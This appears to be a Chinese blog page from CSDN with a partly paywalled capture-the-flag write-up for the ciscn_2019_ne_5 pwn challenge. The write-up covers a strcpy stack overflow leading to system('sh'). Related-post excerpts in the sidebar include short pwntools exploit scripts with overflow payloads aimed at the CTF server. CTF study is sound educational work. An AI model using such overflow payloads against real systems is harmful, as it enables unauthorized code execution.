ciscn_2019_ne_5

最新推荐文章于 2025-01-14 15:54:48 发布
原创 最新推荐文章于 2025-01-14 15:54:48 发布 · 391 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #pwn #python

本文介绍了如何利用32位程序中的strcpy函数溢出漏洞来执行系统命令。通过分析程序,发现在case4中调用了catflag函数,该函数使用strcpy可能导致溢出。在case1中可以输入payload,通过添加log功能为溢出做准备。发现存在system函数的plt地址和fflush函数,暗示了sh字段的存在。由于没有/bin/sh字符串,需要构造payload以执行system('sh')。最终利用此漏洞获取系统权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ciscn_2019_ne_5

Checksec:

Ida:

首先会让我们输入密码,密码正确就会进入一个switch循环

我们看到循环中case4是调用catflag函数,跟进查看

Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出

最低0.47元/天 解锁文章

新学期VIP享超值加赠
_white_233
关注
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 936
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
ciscn-2019-ne-3
11-08
【标题】"ciscn-2019-ne-3" 指向的可能是一个网络安全竞赛或挑战,其中 "ciscn" 可能代表 China International Security Conference Network 或类似的网络安全活动,而 "2019-ne-3" 也许是该活动2019年中的第三个...
ciscn_2019_n_5
、moddemod
06-17 368
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
【BUUCTFPWNciscn_2019_ne_5
m0_55368674的博客
01-15 316
【BUUCTFPWNciscn_2019_ne_5
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1991
buuctf ciscn_2019_ne_5题目分析
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
5. ne_110m_glaciated_areas.cpg:冰川覆盖区的数据,对于研究气候变化和冰川退缩情况至关重要。 6. ne_110m_ocean.cpg:海洋的栅格数据,标识出海洋边界和深度。 7. ne_110m_coastline.cpg:海岸线数据,定义了陆地...
UEFITool_NE_A51_win32.zip
12-24
5. **引导加载器配置**:UEFITool可以用于配置和管理不同的引导加载器,比如GRUB2或Windows Boot Manager,确保系统能够正确启动。 6. **安全启动管理**:对于支持安全启动的系统,UEFITool可以帮助用户管理安全...
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 2674
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
[CTF] ciscn_2019_ne_5
凉水的博客
06-13 574
ciscn_2019_ne_5
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 267
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
BUUCTF ciscn_2019_ne_5
最新发布
2401_88087539的博客
01-14 496
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1153
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
[PWN]ciscn_2019_ne_5
LDX的博客
11-27 331
PWN ciscn_2019_ne_5
UEFITool_NE_A51:Windows平台下的UEFI工具
### UEFITool_NE_A51_win32.zip 解读 #### 标题知识点 **UEFITool_NE_A51_win32.zip** 指的是一份压缩包文件,其名称表明了它的功能和适用平台。从标题可以拆解以下几点重要信息: 1. **UEFITool**:这是软件的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值